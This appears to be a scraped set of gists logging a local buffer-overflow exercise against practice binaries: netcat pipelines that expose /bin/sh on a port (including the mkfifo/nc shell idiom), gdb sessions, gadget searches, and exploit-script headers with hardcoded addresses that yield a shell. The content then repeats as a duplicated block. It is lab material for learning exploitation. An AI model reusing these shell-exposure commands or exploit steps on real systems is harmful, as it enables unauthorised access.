Austin Howard fgsahoward

## med64_exploitation1
[howard@sterling bof]$ cat input | /home/howard/repos/bof/med64 /bin/sh -p 2>&1 | nc -l 127.0.0.1 -p 1234 >input &
[1] 5998
[howard@sterling bof]$ pidof med64
5997
[howard@sterling bof]$ python exploits/med64_exp.py 127.0.0.1 1234
b'Enter some text: '
# whoami
b'howard\n'
# ls
b'Makefile\nNOTES\ncore\neasy.c\neasy32\neasy64\nexp\nexploits\ngdb-env\ngdb-s.env\nhard.c\nhard32\ninput\nmed32\nmed64\noutput\nshell-s.env\nshell.env\nshellcodes\ntools\n'

## med64_exp.py
import os
import sys
import struct
import socket

word_size = 8
execve_address = 0x7ffff7af4470
argv_zero_address = 0x00007fffffffec31
argv_address = 0x7fffffffe980

## med64_debugging3
[howard@sterling bof]$ cat input | /home/howard/repos/bof/med64 /bin/sh -p 2>&1 | nc -l 127.0.0.1 -p 1234 >input &
[1] 5931
[howard@sterling bof]$ pidof med64
5930
[howard@sterling bof]$ sudo gdb -q ./med64 5930
Reading symbols from ./med64...(no debugging symbols found)...done.
Attaching to program: /home/howard/repos/bof/med64, process 5930
Reading symbols from /usr/lib/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib64/ld-linux-x86-64.so.2...(no debugging symbols found)...done.
0x00007ffff7b174d0 in __read_nocancel () from /usr/lib/libc.so.6

## med64_debugging2
[howard@sterling bof]$ gdb -q ./med64
Reading symbols from ./med64...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x0000000000400643 <+0>:push   %rbp
   0x0000000000400644 <+1>:mov    %rsp,%rbp
   0x0000000000400647 <+4>:sub    bashx20,%rsp
   0x000000000040064b <+8>:mov    %edi,-0x4(%rbp)
   0x000000000040064e <+11>:mov    %rsi,-0x10(%rbp)
   0x0000000000400652 <+15>:mov    %rdx,-0x18(%rbp)

## med64_debugging1
[howard@sterling bof]$ gcc -o med64 -fno-stack-protector med.c
[howard@sterling bof]$ ../rp/rp-lin-x64 -f ./med64 --atsyntax -r 3
Trying to open './med64'..
Loading ELF information..
FileFormat: Elf, Arch: x64
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

## med32_exploitation1
[howard@sterling bof]$ python exploits/med32_exp.py 127.0.0.1 1234
b'Enter some text: '
# whoami
b'howard\n'
# ls
b'core\neasy32\neasy64\neasy.c\nexp\nexploits\ngdb-env\ngdb-s.env\nhard32\nhard.c\ninput\nMakefile\nmed32\nmed64\nNOTES\noutput\nshellcodes\nshell.env\nshell-s.env\ntools\n'

## med32_exp.py
import os
import sys
import struct
import socket

word_size = 4
execve_address = 0xf7eac7c0
argv_zero_address = 0xffffdc37
argv_address = 0xffffdab8
envp_address = 0xffffdac4

## med32_debugging4
[howard@sterling bof]$ pidof med32
1929
[howard@sterling bof]$ sudo gdb -q ./med32 1929
Reading symbols from ./med32...(no debugging symbols found)...done.
Attaching to program: /home/howard/repos/bof/med32, process 1929
Reading symbols from /usr/lib32/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
0xf7fd8c99 in __kernel_vsyscall ()
(gdb) x/xw 0xffffdab8
0xffffdab8: 0xffffdc37

## netcat_example2
[howard@sterling bof]$ cat input | /home/howard/repos/bof/med32 /bin/sh -p 2>&1 | nc -l 127.0.0.1 -p 1234 >input

## netcat_example1
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
	[howard@sterling bof]$ cat input \| /home/howard/repos/bof/med64 /bin/sh -p 2>&1 \| nc -l 127.0.0.1 -p 1234 >input &
	[1] 5998
	[howard@sterling bof]$ pidof med64
	5997
	[howard@sterling bof]$ python exploits/med64_exp.py 127.0.0.1 1234
	b'Enter some text: '
	# whoami
	b'howard\n'
	# ls
	b'Makefile\nNOTES\ncore\neasy.c\neasy32\neasy64\nexp\nexploits\ngdb-env\ngdb-s.env\nhard.c\nhard32\ninput\nmed32\nmed64\noutput\nshell-s.env\nshell.env\nshellcodes\ntools\n'
	import os
	import sys
	import struct
	import socket

	word_size = 8
	execve_address = 0x7ffff7af4470
	argv_zero_address = 0x00007fffffffec31
	argv_address = 0x7fffffffe980
	[howard@sterling bof]$ cat input \| /home/howard/repos/bof/med64 /bin/sh -p 2>&1 \| nc -l 127.0.0.1 -p 1234 >input &
	[1] 5931
	[howard@sterling bof]$ pidof med64
	5930
	[howard@sterling bof]$ sudo gdb -q ./med64 5930
	Reading symbols from ./med64...(no debugging symbols found)...done.
	Attaching to program: /home/howard/repos/bof/med64, process 5930
	Reading symbols from /usr/lib/libc.so.6...(no debugging symbols found)...done.
	Reading symbols from /lib64/ld-linux-x86-64.so.2...(no debugging symbols found)...done.
	0x00007ffff7b174d0 in __read_nocancel () from /usr/lib/libc.so.6
	[howard@sterling bof]$ gdb -q ./med64
	Reading symbols from ./med64...(no debugging symbols found)...done.
	(gdb) disas main
	Dump of assembler code for function main:
	0x0000000000400643 <+0>:push %rbp
	0x0000000000400644 <+1>:mov %rsp,%rbp
	0x0000000000400647 <+4>:sub bashx20,%rsp
	0x000000000040064b <+8>:mov %edi,-0x4(%rbp)
	0x000000000040064e <+11>:mov %rsi,-0x10(%rbp)
	0x0000000000400652 <+15>:mov %rdx,-0x18(%rbp)
	[howard@sterling bof]$ gcc -o med64 -fno-stack-protector med.c
	[howard@sterling bof]$ ../rp/rp-lin-x64 -f ./med64 --atsyntax -r 3
	Trying to open './med64'..
	Loading ELF information..
	FileFormat: Elf, Arch: x64
	Using the AT&T syntax..

	Wait a few seconds, rp++ is looking for gadgets..
	in PHDR
	0 found.
	[howard@sterling bof]$ pidof med32
	1929
	[howard@sterling bof]$ sudo gdb -q ./med32 1929
	Reading symbols from ./med32...(no debugging symbols found)...done.
	Attaching to program: /home/howard/repos/bof/med32, process 1929
	Reading symbols from /usr/lib32/libc.so.6...(no debugging symbols found)...done.
	Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
	0xf7fd8c99 in __kernel_vsyscall ()
	(gdb) x/xw 0xffffdab8
	0xffffdab8: 0xffffdc37
	$ rm -f /tmp/f; mkfifo /tmp/f
	$ cat /tmp/f \| /bin/sh -i 2>&1 \| nc -l 127.0.0.1 1234 > /tmp/f